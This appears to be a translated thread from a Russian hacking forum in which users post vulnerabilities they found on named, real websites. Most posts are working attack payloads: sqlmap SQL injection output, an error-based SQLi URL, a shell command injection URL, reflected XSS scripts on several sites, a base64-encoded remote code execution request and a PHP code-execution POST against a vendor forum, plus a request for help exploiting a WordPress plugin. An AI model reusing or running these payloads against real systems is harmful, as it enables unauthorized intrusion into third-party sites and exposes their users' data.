SQLi, XSS and other vulnerabilities.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. RWD

    way.com
    Code:
    https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
    Parameter: pid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    

    Code:
    http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
     
    #321 RWD, 16 Mar 2019
    Last edited: 17 Mar 2019
  2. BabaDook


    System command execution
    https://www.dixongin.com/pages/weathermap.php/InterRAD?height=1|ls hacked&&width=260&zipcode=31749

    In the zipcode file I found:
    And there are 420,000 lines like that.
    I didn't upload it, I only found it.
     
  3. BabaDook

  4. BabaDook

  5. emperiance

    Guys, help me please! I have a page with a 301 redirect on it. The redirect works. When I check the response code in Yandex, it's 301, but in Google it's 200. What kind of magic is this and what should I do about it?
     
  6. BenderMR

    Bandits, tell me how to exploit this one: WordPress Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation? None of the links from wpscan give anything useful.
    There are no exploitation methods described anywhere on the internet either.
     
  7. b3

  8. BenderMR

    That's all clear. I read that first thing. But how exactly do I create a new form? To which path do I send this POST data?
    Directly to site.com/wp-admin/post.php, or what?
     
  9. crlf

    Code:
    https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
    
     
  10. Baskin-Robbins

    Reflected XSS:
    Code:
    http://bluesystem.info/love/?sortby=editor">[2]</a><script>alert("a")</script>
    
    Code:
    https://intimgirls.net/search/?priceMin="><script>alert(/a/.source)</script>
    
    Code:
    https://sextalk.ru/postlist.php?Board=help></a><script>alert("a");location.href = "https://sextalk.ru"</script
    
    Code:
    http://69-dating.com/search.php?sort=date"><script>alert(/a/.source)</script>&submit=%CD%E0%E9%F2%E8
    
     
  11. lifescore

    rce (=

    шттп://www.t| u | torialspoint.com/



    Stat on similarweb =)




    PoC
    Code:
    from base64
    UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
    
     
    #331 lifescore, 4 Sep 2019
    Last edited: 4 Sep 2019
  12. Pop-Xlop

    ZoneAlarm
    Code:
    https://forums.zonealarm.com/ajax/render/widget_php
    POST:
    widgetConfig[code]=phpinfo();
    
     
  13. BabaDook
